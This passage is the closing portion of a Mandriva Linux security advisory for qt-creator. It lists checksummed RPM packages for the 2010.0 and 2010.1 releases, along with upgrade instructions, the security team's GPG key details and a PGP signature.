2010.0/i586/libcplusplus1-1.2.1-2.2mdv2010.0.i586.rpm 33d7aa73bc3793f7327e5e2160409f4b 2010.0/i586/libextensionsystem1-1.2.1-2.2mdv2010.0.i586.rpm 6429fd08060935dbecf7f7bdec4d2160 2010.0/i586/libqtconcurrent1-1.2.1-2.2mdv2010.0.i586.rpm 029072ad2feb8299499a79f75bf4ae8e 2010.0/i586/libutils1-1.2.1-2.2mdv2010.0.i586.rpm af66282a6100278935d3a2137af01522 2010.0/i586/qt-creator-1.2.1-2.2mdv2010.0.i586.rpm 617fccd89b2020320e4492364caed27c 2010.0/i586/qt-creator-doc-1.2.1-2.2mdv2010.0.i586.rpm 1a7f7c6820ac43102c30bf3c5ffa570c 2010.0/SRPMS/qt-creator-1.2.1-2.2mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: a2b277c9e816765850be2242dd725738 2010.0/x86_64/lib64aggregation1-1.2.1-2.2mdv2010.0.x86_64.rpm 553865d75cf73ac6c878b013dd7230eb 2010.0/x86_64/lib64cplusplus1-1.2.1-2.2mdv2010.0.x86_64.rpm b4067d049b8333c6986eb7b7ae15bd92 2010.0/x86_64/lib64extensionsystem1-1.2.1-2.2mdv2010.0.x86_64.rpm 4edc6b295e3da81e798abf9fd7f29055 2010.0/x86_64/lib64qtconcurrent1-1.2.1-2.2mdv2010.0.x86_64.rpm 4513fa9422e50fc2766009cd0e36bef3 2010.0/x86_64/lib64utils1-1.2.1-2.2mdv2010.0.x86_64.rpm 75e44c0a21ee51a31723b8745f1dafca 2010.0/x86_64/qt-creator-1.2.1-2.2mdv2010.0.x86_64.rpm f150dba6979ef40f976972f6acc75180 2010.0/x86_64/qt-creator-doc-1.2.1-2.2mdv2010.0.x86_64.rpm 1a7f7c6820ac43102c30bf3c5ffa570c 2010.0/SRPMS/qt-creator-1.2.1-2.2mdv2010.0.src.rpm Mandriva Linux 2010.1: 127afd19d86e5e5fb75a9a9a98ceec10 2010.1/i586/qt-creator-1.3.1-3.2mdv2010.1.i586.rpm 2af40e3c8026a3cf2c2a363bac6f04c5 2010.1/i586/qt-creator-doc-1.3.1-3.2mdv2010.1.i586.rpm 4cd4b31b37f920c3c4e8c074c5d6e6d5 2010.1/SRPMS/qt-creator-1.3.1-3.2mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: d36be9f4a84212098a5c18248a5f4465 2010.1/x86_64/qt-creator-1.3.1-3.2mdv2010.1.x86_64.rpm 911034c2b800c9021141242a56aae79a 2010.1/x86_64/qt-creator-doc-1.3.1-3.2mdv2010.1.x86_64.rpm 4cd4b31b37f920c3c4e8c074c5d6e6d5 2010.1/SRPMS/qt-creator-1.3.1-3.2mdv2010.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFMqEsRmqjQ0CJFipgRAm4BAJ0b7XnaZghX83QGkIWeI0h4/+AdbgCfVdIv XmQcNcc6OmY0kXyBYjnudVs= =YDKE -END PGP SIGNATURE-